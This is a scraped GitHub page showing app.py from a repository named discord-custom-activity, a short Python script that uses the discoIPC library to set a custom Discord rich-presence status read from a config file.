dropdown-menu-sw"> <li class="d-block d-md-none"> <a class="dropdown-item d-flex flex-items-baseline" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;FIND_FILE_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="c1741d2af11cddb7e7412f38207326d10be1eee4009dab1c2fcfffcfe5bfe980" data-ga-click="Repository, find file, location:repo overview" data-hotkey="t" data-pjax="true" href="/agambajwa/discord-custom-activity/find/master"> <span class="flex-auto">Go to file</span> <span class="text-small color-text-secondary" aria-hidden="true">T</span> </a> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-line-details-dialog" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to line</span> <span class="text-small color-text-secondary" aria-hidden="true">L</span> </span> </button> </li> <li data-toggle-for="blob-more-options-details"> <button data-toggle-for="jumpto-symbol-select-menu" type="button" data-view-component="true" class="dropdown-item btn-link"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Go to definition</span> <span class="text-small color-text-secondary" aria-hidden="true">R</span> </span> </button> </li> <li class="dropdown-divider" role="none"></li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy path" value="app.py" data-view-component="true" class="dropdown-item cursor-pointer"> Copy path </clipboard-copy> </li> <li> <clipboard-copy data-toggle-for="blob-more-options-details" aria-label="Copy permalink" value="https://github.com/agambajwa/discord-custom-activity/blob/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py" data-view-component="true" class="dropdown-item cursor-pointer"> <span class="d-flex flex-items-baseline"> <span class="flex-auto">Copy permalink</span> </span> </clipboard-copy> </li> </ul> </div> </details> </div> <div class="Box d-flex flex-column flex-shrink-0 mb-3"> <include-fragment src="/agambajwa/discord-custom-activity/contributors/master/app.py" class="commit-loader"> <div class="Box-header d-flex flex-items-center"> <div class="Skeleton avatar avatar-user flex-shrink-0 ml-n1 mr-n1 mt-n1 mb-n1" style="width:24px;height:24px;"></div> <div class="Skeleton Skeleton--text col-5 ml-2">&nbsp;</div> </div> <div class="Box-body d-flex flex-items-center" > <div class="Skeleton Skeleton--text col-1">&nbsp;</div> <span class="color-text-danger h6 loader-error">Cannot retrieve contributors at this time</span> </div> </include-fragment> </div> <div data-target="readme-toc.content" class="Box mt-3 position-relative "> <div class="Box-header py-2 pr-2 d-flex flex-shrink-0 flex-md-row flex-items-center" > <div class="text-mono f6 flex-auto pr-3 flex-order-2 flex-md-order-1"> 46 lines (38 sloc) <span class="file-info-divider"></span> 1015 Bytes </div> <div class="d-flex py-1 py-md-0 flex-auto flex-order-1 flex-md-order-2 flex-sm-grow-0 flex-justify-between hide-sm hide-md"> <div class="BtnGroup"> <a href="/agambajwa/discord-custom-activity/raw/master/app.py" id="raw-url" role="button" data-view-component="true" class="btn-sm btn BtnGroup-item"> Raw </a> <a href="/agambajwa/discord-custom-activity/blame/master/app.py" data-hotkey="b" role="button" data-view-component="true" class="js-update-url-with-hash btn-sm btn BtnGroup-item"> Blame </a> </div> <div> <a class="btn-octicon tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" aria-label="Open this file in GitHub Desktop" data-ga-click="Repository, open with desktop"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-device-desktop"> <path fill-rule="evenodd" d="M1.75 2.5h12.5a.25.25 0 01.25.25v7.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25v-7.5a.25.25 0 01.25-.25zM14.25 1H1.75A1.75 1.75 0 000 2.75v7.5C0 11.216.784 12 1.75 12h3.727c-.1 1.041-.52 1.872-1.292 2.757A.75.75 0 004.75 16h6.5a.75.75 0 00.565-1.243c-.772-.885-1.193-1.716-1.292-2.757h3.727A1.75 1.75 0 0016 10.25v-7.5A1.75 1.75 0 0014.25 1zM9.018 12H6.982a5.72 5.72 0 01-.765 2.5h3.566a5.72 5.72 0 01-.765-2.5z"></path> </svg> </a> <remote-clipboard-copy class="d-inline-block btn-octicon" style="height: 26px" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy <span data-target="remote-clipboard-copy.idle"> <span class="tooltipped tooltipped-nw cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40" aria-label="Copy raw contents"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path> </svg> </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Copied!"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> <span class="tooltipped tooltipped-nw" aria-label="Something went wrong. Try again."> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </span> </remote-clipboard-copy> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form js-update-url-with-hash" action="/agambajwa/discord-custom-activity/edit/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="JNSPx4+edOJ4WuJlWAfZuhILKwlrsffHdo0azFAoNPLBRZkHQ1RfN4vEIE09btacItBs0wbIq0vJGRVkZ2ZA6g==" /> <button class="btn-octicon tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and edit the file" data-hotkey="e" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-pencil"> <path fill-rule="evenodd" d="M11.013 1.427a1.75 1.75 0 012.474 0l1.086 1.086a1.75 1.75 0 010 2.474l-8.61 8.61c-.21.21-.47.364-.756.445l-3.251.93a.75.75 0 01-.927-.928l.929-3.25a1.75 1.75 0 01.445-.758l8.61-8.61zm1.414 1.06a.25.25 0 00-.354 0L10.811 3.75l1.439 1.44 1.263-1.263a.25.25 0 000-.354l-1.086-1.086zM11.189 6.25L9.75 4.81l-6.286 6.287a.25.25 0 00-.064.108l-.558 1.953 1.953-.558a.249.249 0 00.108-.064l6.286-6.286z"></path> </svg> </button> </form> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="inline-form" action="/agambajwa/discord-custom-activity/delete/master/app.py" accept-charset="UTF-8" method="post"><input type="hidden" name="authenticity_token" value="OibpDzLUKYX9Osb3BVKMD8HPENt+M/zePb/fqBW6lq6ti32WNXO3wezy3hLuFD24emiY+YaU6pw5iBs9SBCWqg==" /> <button class="btn-octicon btn-octicon-danger tooltipped tooltipped-nw" type="submit" aria-label="Fork this project and delete the file" data-disable-with> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-trash"> <path fill-rule="evenodd" d="M6.5 1.75a.25.25 0 01.25-.25h2.5a.25.25 0 01.25.25V3h-3V1.75zm4.5 0V3h2.25a.75.75 0 010 1.5H2.75a.75.75 0 010-1.5H5V1.75C5 .784 5.784 0 6.75 0h2.5C10.216 0 11 .784 11 1.75zM4.496 6.675a.75.75 0 10-1.492.15l.66 6.6A1.75 1.75 0 005.405 15h5.19c.9 0 1.652-.681 1.741-1.576l.66-6.6a.75.75 0 00-1.492-.149l-.66 6.6a.25.25 0 01-.249.225h-5.19a.25.25 0 01-.249-.225l-.66-6.6z"></path> </svg> </button> </form> </div> </div> <div class="d-flex hide-lg hide-xl flex-order-2 flex-grow-0"> <details class="dropdown details-reset details-overlay d-inline-block"> <summary class="btn-octicon" aria-haspopup="true" aria-label="possible actions"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <ul class="dropdown-menu dropdown-menu-sw" style="width: 175px"> <li> <a class="dropdown-item tooltipped tooltipped-nw js-remove-unless-platform" data-platforms="windows,mac" href="https://desktop.github.com" data-ga-click="Repository, open with desktop"> Open with Desktop </a> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/raw/master/app.py"> View raw </a> </li> <li> <remote-clipboard-copy class="dropdown-item" data-src="/agambajwa/discord-custom-activity/raw/master/app.py" data-action="click:remote-clipboard-copy <span data-target="remote-clipboard-copy.idle"> <span class="cursor-pointer" data-hydro-click="{&quot;event_type&quot;:&quot;repository.click&quot;,&quot;payload&quot;:{&quot;target&quot;:&quot;COPY_RAW_CONTENTS_BUTTON&quot;,&quot;repository_id&quot;:298526344,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="e53a27ab14298c3efe29c78eae6edddde764a5cc9397f6bfea195fd867c5ff40"> Copy raw contents </span></span> <span data-target="remote-clipboard-copy.fetching" hidden="hidden"> Copy raw contents <span class="d-inline-block position-relative" style="top: 3px"> <svg aria-label="fetching contents…" style="box-sizing: content-box; color: var(--color-icon-primary);" width="16" height="16" viewBox="0 0 16 16" fill="none" data-view-component="true" class="anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </span> </span> <span data-target="remote-clipboard-copy.success" hidden="hidden"> Copy raw contents <svg aria-label="Copied!" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check color-text-success"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path> </svg> </span> <span data-target="remote-clipboard-copy.error" hidden="hidden"> Copy raw contents <svg aria-label="Something went wrong. Try again." role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert color-text-warning"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path> </svg> </span> </remote-clipboard-copy> </li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/blame/master/app.py"> View blame </a> </li> <li class="dropdown-divider" role="none"></li> <li> <a class="dropdown-item" href="/agambajwa/discord-custom-activity/edit/master/app.py">Edit file</a> </li> <li> <a class="dropdown-item menu-item-danger" href="/agambajwa/discord-custom-activity/delete/master/app.py">Delete file</a> </li> </ul> </details> </div> </div> <div itemprop="text" class="Box-body p-0 blob-wrapper data type-python gist-border-0"> <table class="highlight tab-size js-file-line-container" data-tab-size="8" data-paste-markdown-skip> <tr> <td id="L1" class="blob-num js-line-number" data-line-number="1"></td> <td id="LC1" class="blob-code blob-code-inner js-file-line"><span class=pl-k>from</span> <span class=pl-s1>discoIPC</span> <span class=pl-k>import</span> <span class=pl-s1>ipc</span></td> </tr> <tr> <td id="L2" class="blob-num js-line-number" data-line-number="2"></td> <td id="LC2" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>configparser</span></td> </tr> <tr> <td id="L3" class="blob-num js-line-number" data-line-number="3"></td> <td id="LC3" class="blob-code blob-code-inner js-file-line"><span class=pl-k>import</span> <span class=pl-s1>time</span></td> </tr> <tr> <td id="L4" class="blob-num js-line-number" data-line-number="4"></td> <td id="LC4" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L5" class="blob-num js-line-number" data-line-number="5"></td> <td id="LC5" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span> <span class=pl-c1>=</span> <span class=pl-s1>configparser</span>.<span class=pl-v>ConfigParser</span>()</td> </tr> <tr> <td id="L6" class="blob-num js-line-number" data-line-number="6"></td> <td id="LC6" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>config</span>.<span class=pl-en>read</span>(<span class=pl-s>&#39;config.ini&#39;</span>)</td> </tr> <tr> <td id="L7" class="blob-num js-line-number" data-line-number="7"></td> <td id="LC7" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L8" class="blob-num js-line-number" data-line-number="8"></td> <td id="LC8" class="blob-code blob-code-inner js-file-line"><span class=pl-s1>base_activity</span> <span class=pl-c1>=</span> {</td> </tr> <tr> <td id="L9" class="blob-num js-line-number" data-line-number="9"></td> <td id="LC9" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;details&#39;</span>: <span class=pl-s>&#39;Custom details&#39;</span>,</td> </tr> <tr> <td id="L10" class="blob-num js-line-number" data-line-number="10"></td> <td id="LC10" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;state&#39;</span> : <span class=pl-s>&#39;Custom state&#39;</span>,</td> </tr> <tr> <td id="L11" class="blob-num js-line-number" data-line-number="11"></td> <td id="LC11" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;assets&#39;</span>: {</td> </tr> <tr> <td id="L12" class="blob-num js-line-number" data-line-number="12"></td> <td id="LC12" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_image&#39;</span>: <span class=pl-s>&#39;image_name&#39;</span>,</td> </tr> <tr> <td id="L13" class="blob-num js-line-number" data-line-number="13"></td> <td id="LC13" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;large_text&#39;</span>: <span class=pl-s>&#39;Image text&#39;</span>,</td> </tr> <tr> <td id="L14" class="blob-num js-line-number" data-line-number="14"></td> <td id="LC14" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_image&#39;</span>: <span class=pl-s>&#39;small_image_name&#39;</span>,</td> </tr> <tr> <td id="L15" class="blob-num js-line-number" data-line-number="15"></td> <td id="LC15" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;small_text&#39;</span>: <span class=pl-s>&#39;Small image text&#39;</span></td> </tr> <tr> <td id="L16" class="blob-num js-line-number" data-line-number="16"></td> <td id="LC16" class="blob-code blob-code-inner js-file-line"> },</td> </tr> <tr> <td id="L17" class="blob-num js-line-number" data-line-number="17"></td> <td id="LC17" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;party&#39;</span>: {</td> </tr> <tr> <td id="L18" class="blob-num js-line-number" data-line-number="18"></td> <td id="LC18" class="blob-code blob-code-inner js-file-line"> <span class=pl-s>&#39;size&#39;</span>: [<span class=pl-c1>1</span>, <span class=pl-c1>5</span>]</td> </tr> <tr> <td id="L19" class="blob-num js-line-number" data-line-number="19"></td> <td id="LC19" class="blob-code blob-code-inner js-file-line"> }</td> </tr> <tr> <td id="L20" class="blob-num js-line-number" data-line-number="20"></td> <td id="LC20" class="blob-code blob-code-inner js-file-line">}</td> </tr> <tr> <td id="L21" class="blob-num js-line-number" data-line-number="21"></td> <td id="LC21" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L22" class="blob-num js-line-number" data-line-number="22"></td> <td id="LC22" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>main</span>():</td> </tr> <tr> <td id="L23" class="blob-num js-line-number" data-line-number="23"></td> <td id="LC23" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span> <span class=pl-c1>=</span> <span class=pl-s1>ipc</span>.<span class=pl-v>DiscordIPC</span>(<span class=pl-s1>config</span>[<span class=pl-s>&#39;CLIENT&#39;</span>][<span class=pl-s>&#39;client_id&#39;</span>])</td> </tr> <tr> <td id="L24" class="blob-num js-line-number" data-line-number="24"></td> <td id="LC24" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Connect to Discord Client</span></td> </tr> <tr> <td id="L25" class="blob-num js-line-number" data-line-number="25"></td> <td id="LC25" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>connect</span>()</td> </tr> <tr> <td id="L26" class="blob-num js-line-number" data-line-number="26"></td> <td id="LC26" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L27" class="blob-num js-line-number" data-line-number="27"></td> <td id="LC27" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Starting Custom Activity...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L28" class="blob-num js-line-number" data-line-number="28"></td> <td id="LC28" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>time</span>.<span class=pl-en>sleep</span>(<span class=pl-c1>5</span>)</td> </tr> <tr> <td id="L29" class="blob-num js-line-number" data-line-number="29"></td> <td id="LC29" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L30" class="blob-num js-line-number" data-line-number="30"></td> <td id="LC30" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>try</span>:</td> </tr> <tr> <td id="L31" class="blob-num js-line-number" data-line-number="31"></td> <td id="LC31" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>update_activity</span>(<span class=pl-en>set_activity</span>()) <span class=pl-c># Update Activity</span></td> </tr> <tr> <td id="L32" class="blob-num js-line-number" data-line-number="32"></td> <td id="LC32" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>while</span> <span class=pl-c1>True</span>:</td> </tr> <tr> <td id="L33" class="blob-num js-line-number" data-line-number="33"></td> <td id="LC33" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>input</span>(<span class=pl-s>&#39;<span class=pl-cce>\n</span>Connected! &#39;</span>)</td> </tr> <tr> <td id="L34" class="blob-num js-line-number" data-line-number="34"></td> <td id="LC34" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Do nothing </span></td> </tr> <tr> <td id="L35" class="blob-num js-line-number" data-line-number="35"></td> <td id="LC35" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L36" class="blob-num js-line-number" data-line-number="36"></td> <td id="LC36" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>except</span> <span class=pl-v>KeyboardInterrupt</span>:</td> </tr> <tr> <td id="L37" class="blob-num js-line-number" data-line-number="37"></td> <td id="LC37" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>print</span>(<span class=pl-s>&#39;Disconnecting...<span class=pl-cce>\n</span>&#39;</span>)</td> </tr> <tr> <td id="L38" class="blob-num js-line-number" data-line-number="38"></td> <td id="LC38" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>client</span>.<span class=pl-en>disconnect</span>()</td> </tr> <tr> <td id="L39" class="blob-num js-line-number" data-line-number="39"></td> <td id="LC39" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L40" class="blob-num js-line-number" data-line-number="40"></td> <td id="LC40" class="blob-code blob-code-inner js-file-line"><span class=pl-k>def</span> <span class=pl-en>set_activity</span>():</td> </tr> <tr> <td id="L41" class="blob-num js-line-number" data-line-number="41"></td> <td id="LC41" class="blob-code blob-code-inner js-file-line"> <span class=pl-c># Set acitivty for the player.</span></td> </tr> <tr> <td id="L42" class="blob-num js-line-number" data-line-number="42"></td> <td id="LC42" class="blob-code blob-code-inner js-file-line"> <span class=pl-s1>activity</span> <span class=pl-c1>=</span> <span class=pl-s1>base_activity</span></td> </tr> <tr> <td id="L43" class="blob-num js-line-number" data-line-number="43"></td> <td id="LC43" class="blob-code blob-code-inner js-file-line"> <span class=pl-k>return</span> <span class=pl-s1>activity</span></td> </tr> <tr> <td id="L44" class="blob-num js-line-number" data-line-number="44"></td> <td id="LC44" class="blob-code blob-code-inner js-file-line"> </td> </tr> <tr> <td id="L45" class="blob-num js-line-number" data-line-number="45"></td> <td id="LC45" class="blob-code blob-code-inner js-file-line"><span class=pl-k>if</span> <span class=pl-s1>__name__</span> <span class=pl-c1>==</span> <span class=pl-s>&#39;__main__&#39;</span>:</td> </tr> <tr> <td id="L46" class="blob-num js-line-number" data-line-number="46"></td> <td id="LC46" class="blob-code blob-code-inner js-file-line"> <span class=pl-en>main</span>()</td> </tr> </table> <details class="details-reset details-overlay BlobToolbar position-absolute js-file-line-actions dropdown d-none" aria-hidden="true"> <summary class="btn-octicon ml-0 px-2 p-0 color-bg-primary border color-border-tertiary rounded-1" aria-label="Inline file action toolbar"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zM1.5 9a1.5 1.5 0 100-3 1.5 1.5 0 000 3zm13 0a1.5 1.5 0 100-3 1.5 1.5 0 000 3z"></path> </svg> </summary> <details-menu> <ul class="BlobToolbar-dropdown dropdown-menu dropdown-menu-se ml-2 mt-2" style="width:185px" > <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-lines" style="cursor:pointer;" aria-label="Copy lines"> Copy lines </clipboard-copy> </li> <li> <clipboard-copy role="menuitem" class="dropdown-item" id="js-copy-permalink" style="cursor:pointer;" aria-label="Copy permalink"> Copy permalink </clipboard-copy> </li> <li><a class="dropdown-item js-update-url-with-hash" id="js-view-git-blame" role="menuitem" href="/agambajwa/discord-custom-activity/blame/9a6488f083af4b9c41113cffbb0b8e4356985c11/app.py">View git blame</a></li> <li><a class="dropdown-item" id="js-new-issue" role="menuitem" href="/agambajwa/discord-custom-activity/issues/new">Reference in new issue</a></li> </ul> </details-menu> </details> </div> </div> <details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line&hellip;" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go </button> </form> </details-dialog> </details> <div class="Popover anim-scale-in js-tagsearch-popover" hidden data-tagsearch-url="/agambajwa/discord-custom-activity/find-definition" data-tagsearch-ref="master" data-tagsearch-path="app.py" data-tagsearch-lang="Python" data-hydro-click="{&quot;event_type&quot;:&quot;code_navigation.click_on_symbol&quot;,&quot;payload&quot;:{&quot;action&quot;:&quot;click_on_symbol&quot;,&quot;repository_id&quot;:298526344,&quot;ref&quot;:&quot;master&quot;,&quot;language&quot;:&quot;Python&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="0a8f6a41e955842b0be9a33175d7ebbdd2cb6543f0698dc9866704903cd61c36"> <div class="Popover-message Popover-message--large Popover-message--top-left TagsearchPopover mt-1 mb-4 mx-auto Box color-shadow-large"> <div class="TagsearchPopover-content js-tagsearch-popover-content overflow-auto" style="will-change:transform;"> </div> </div> </div> </div> </div> </div> </main> </div> </div> <div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-text-secondary border-top color-border-secondary "> <ul class="list-style-none d-flex flex-wrap col-12 col-lg-5 flex-justify-center flex-lg-justify-between mb-2 mb-lg-0"> <li class="mr-3 mr-lg-0">&copy; 2021 GitHub, Inc.</li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-terms-of-service" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to terms&quot;,&quot;label&quot;:&quot;text:terms&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="cad6f39ced678e86d7a5e96c023c0fa2c5891ec5b3616a49afcdaa21ee3d0c12">Terms</a></li> <li class="mr-3 mr-lg-0"><a href="https://docs.github.com/en/github/site-policy/github-privacy-statement" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to privacy&quot;,&quot;label&quot;:&quot;text:privacy&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="263230e8c537a87a5634a289f54b032bfa6685a1a11a704bbf33de36a0553bab">Privacy</a></li> <li class="mr-3 mr-lg-0"><a data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to security&quot;,&quot;label&quot;:&quot;text:security&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="46892c668135bbb345714e41d8dd65b412a7bc1ac126e1104a21457b01280b3b" href="https://github.com/security">Security</a></li> <li class="mr-3 mr-lg-0"><a href="https://www.githubstatus.com/" data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Footer&quot;,&quot;action&quot;:&quot;go to status&quot;,&quot;label&quot;:&quot;text:status&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="850b1e9b63cf1369fce12635727170f159af2c820c10b435a1369da13f6a3b37">Status</a></li> <li><a data-ga-click="Footer, go to help, text:Docs" href="https://docs.github.com">Docs</a></li> </ul> <a aria-label="Homepage" title="GitHub" class="footer-octicon d-none d-lg-block mx-lg-4" href="https://github.com"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 